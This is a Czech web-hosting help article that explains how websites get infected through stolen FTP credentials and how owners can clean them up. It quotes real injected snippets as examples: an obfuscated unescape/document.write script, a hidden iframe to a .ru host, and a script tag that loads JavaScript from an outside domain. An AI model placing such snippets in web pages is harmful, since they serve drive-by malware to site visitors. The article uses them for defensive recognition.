Webové viry
Návody pro C4
Webové stránky byly pravděpodobně napadeny virem, pokud při natahování webových stránek dochází k jedné z následujících událostí:
- antivirus hlásí bezpečnostní riziko (resp. pokus o útok na váš počítač)
- vyskakuje okno s aktivací prvků ActiveX, které se v minulosti neobjevovalo
- ve zdrojovém kódu HTML stránky (PHP skriptu) se objevila neznámá část kódu
- prohlížeč hlásí chyby, které se v minulosti neobjevovaly (např. chyby v javascriptu)
Příklad viru ve zdrojovém kódu HTML stránky (resp. PHP skriptu):
<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28Qg %21%3D1%29%7Bfunction%20JI%28fR%29%7Breturn%20fR%7Dtry%7Bfunctio n%20wcr%28jzA%29%7Breturn%20parseInt%28jzA%29%7Dvar%20XSf%3D%276 E+%3D2%29%7BSqs%3Dsjz.substr%28zGE%2C2%29%3Bfor%28ZSk%3D0%3BZSk% 3CXSf.length%3BZSk++%29%7Bif%28XSf%5BZSk%5D%3D%3DSqs%29break%3B% 7DVBy+%3DString.fromCharCode%28QdU%5BZSk%5D%5E132%29%3B%7Ddocume nt.write%28VBy%29%3B%7Dcatch%28nxu%29%7B%7D%7Dvar%20Qg%3D1%3C/sc ript%3E"))</script><!--[/z0s]-->
Následuje ukázka viru ve zdrojovém kódu, který odkazuje na stránky s nebezpečným obsahem. Po zobrazení stránky se spustí skrytá aplikace na pozadí a vir se vám nahraje na počítač (pokud se mu podaří zneužít nějakou bezpečnostní chybu v internetovém prohlížeči).
<div style="display:none">kswugmkyvsbzcxeeklnefrztojbcbvh<iframe width=455 height=359 src="http://b-i-o-v.ru:8080/index.php" ></iframe></div>
nebo
<!-- ad --><script language=javascript src="http://crew.abnc-portal.com/show.js"></script><!-- /ad -->
Jak fungují webové viry
Zavirování webových stránek je většinou způsobeno zneužitím FTP účtu webových stránek. Útočník získá FTP přístup k vašim webovým stránkám typicky jedním ze dvou způsobů:
- Počítač, na kterém máte uložena hesla (např. v programu Total Commander) pro FTP přístup, je napaden virem a ten odešle všechna uložená hesla útočníkovi, který si je uloží do databáze.
- Příhlásíte se na FTP server z počítače, který je zavirovaný (hesla nemusíte ukládat, stačí že zadáte přihlašovací jméno a heslo do FTP klienta). Virus "odposlechne" zadané přístupové údaje a zašle je útočníkovi.
Útočník, který má uloženy přístupové údaje na vaše webové stránky, se může kdykoliv rozhodnout je zneužít k nejrůznějším účelům, např. k rozesílání spamů a virů nebo k útokům na jiné počítače. FTP přístup na vaše webové stránky většinou využije i k dalšímu šíření viru. Do stránek umístí kód webového viru (příklad takového kódu je uveden výše), může se např. jednat o kód v Javascriptu, který dokáže využít neopravených chyb v internetovém prohlížeči a každému návštěvníkovi (jehož prohlížeč nemá opravenou příslušnou chybu) nainstaluje do počítače skutečný virus. Nainstalovaný virus kromě jiných věcí (např. zneužije počítač návštěvníka k rozesílnání spamu, k útokům na jiné počítače apod.) následně odešle všechny uložené FTP přístupy útočníkovi a vše se opakuje. Virus se tedy šíří pomocí kódu přidaného do webových stránek - proto název webový virus.
Postup pro odvirování
K úniku přístupových údajů (jméno a heslo pro FTP přístup na web) mohlo dojít na jiném než na vašem osobním počítači. Pokud jste např. používali FTP přístup v internetové kavárně, mohl tam být virus, který údaje "odposlechl" a zaslal je do databáze útočníkovi. Pokud je váš web zavirovaný, neznamená to tedy nutně, že máte zavirovaný osobní počítač. Máte-li kvalitní antivirus s pravidelnou aktualizací databáze virů, můžete postupovat dle bodů 4. a 5., v opačném případě postupujte dle všech níže uvedených instrukcí.
- Nainstalujte si kvalitní antivirus, případně ho zaktualizujte. Doporučujeme například Norton Antivirus od společnosti Symantec. Pro verzi viru ve zdrojovém kódu doporučujeme stažení aplikace ze stránek http://www.freedrweb.com.
- Udělejte kompletní prověření všech diskových jednotek a počítač odvirujte.
- Zrestartujte počítač
- Změňte všechna hesla v administračním systému - heslo pro vstup do administračního systému k doméně, hesla pro FTP přístup k webům, hesla k emailovým schránkám a hesla k databázím.
- Smažte obsah webu a nahrajte tam nezavirované stránky ze zálohy. Pokud se jedná o vir ve zdrojovém kódu, stačí škodlivý kód nalézt a smazat.
- Udržujte antivir aktualizovaný.
Odvirování aplikace Joomla 1.5
Pokud se jedná o napadenou instalaci aplikace Joomla 1.5, detailní postup naleznete v článku Joomla 1.5 - Odvirování napadených stránek.
Diskuzní fórum pro článek Webové viry
Nové diskuzní téma můžete založit v sekci Ostatní.
Témata | Reakce | Poslední příspěvek |
---|---|---|
Útok na web | 13 | 31.03.2011 17:55 |
Zabezpečení stránek | 4 | 09.01.2010 15:33 |
Kompletní výpis diskuzních témat pro článek Webové viry
Změny a kontroly
K dispozici je kompletní přehled všech změn a kontrol v tomto návodu.
Webové viry
Publikace: | 17.9.2007 |
Změna: | 17.7.2013 |
Přehled změn a kontrol |
Novinky
- 12.9. - Drupal 11 - Konfigurační soubor
- 11.9. - Drupal 11 - Instalace a čeština
Diskuzní fórum
- Webové aplikace
- Tvorba web stránek
- PHP, MySQL